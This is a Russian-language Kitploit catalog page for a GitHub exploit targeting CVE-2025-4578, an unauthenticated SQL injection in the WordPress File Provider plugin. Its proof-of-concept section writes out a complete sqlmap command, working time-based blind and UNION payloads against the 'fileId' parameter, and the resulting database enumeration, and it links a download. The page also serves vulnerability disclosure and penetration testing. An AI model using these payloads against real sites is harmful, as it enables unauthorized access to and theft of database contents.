Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-4578 — File Provider <= 1.2.3 - Неаутентифицированная SQL-инъекция | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/cve-2025-4578
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubrandomrobbiebf/cve-2025-4578

CVE-2025-4578

File Provider <= 1.2.3 - Неаутентифицированная SQL-инъекция

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-4578

File Provider <= 1.2.3 - Неаутентифицированная SQL-инъекция

Описание

Плагин File Provider для WordPress подвержен SQL-инъекции через параметр 'fileId' во всех версиях до 1.2.3 включительно из-за недостаточного экранирования пользовательского параметра и отсутствия должной подготовки существующего SQL-запроса. Это позволяет неаутентифицированным злоумышленникам добавлять дополнительные SQL-запросы в уже существующие, что может быть использовано для извлечения конфиденциальной информации из базы данных.

Детали

  • Тип: plugin
  • Слаг: file-provider
  • Затронутая версия: 1.2.3
  • Оценка CVSS: 7.5
  • Рейтинг CVSS: High
  • Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2025-4578
  • Статус: Закрыт

POC

root@kitploit:~
sqlmap.py -u "http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php?action=dfp_download_file&fileId=*" --dbs --batch --dbms mysql --level=5 --risk=3 --threads=1 --time-sec=5
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.7.3#dev}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:27:43 /2025-07-10/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[12:27:44] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[12:27:44] [INFO] testing connection to the target URL
[12:27:44] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=3c848e84eb9...0a1642563d'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php?action=dfp_download_file&fileId=(SELECT 6405 FROM (SELECT(SLEEP(5)))IWaW)

    Type: UNION query
    Title: Generic UNION query (random number) - 1 column
    Payload: http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php?action=dfp_download_file&fileId=-9489 UNION ALL SELECT CONCAT(0x7170717671,0x7a444e596a635a4a5973674b546c5748505855427457424358546451667473444c444c614f455173,0x71626b7171)-- -
---
[12:27:44] [INFO] testing MySQL
[12:27:45] [INFO] confirming MySQL
[12:27:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: PHP 8.2.28, PHP, Apache 2.4.62
back-end DBMS: MySQL >= 9.0.0
[12:27:45] [INFO] fetching database names
[12:27:45] [INFO] retrieved: 'information_schema'
[12:27:45] [INFO] retrieved: 'performance_schema'
[12:27:45] [INFO] retrieved: 'exampledb'
Скачать инструмент